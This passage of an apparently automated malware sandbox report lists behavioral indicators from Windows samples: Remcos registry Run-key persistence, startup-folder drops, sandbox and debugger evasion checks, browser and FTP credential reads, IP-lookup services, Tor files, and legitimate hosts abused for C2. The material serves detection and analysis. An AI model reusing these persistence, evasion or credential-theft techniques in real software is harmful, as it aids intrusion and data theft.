| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bbvlnu.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1664_133785010349282403\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1664_133785010349282403\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
Checks installed software on the system
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wermgr.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\wermgr.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
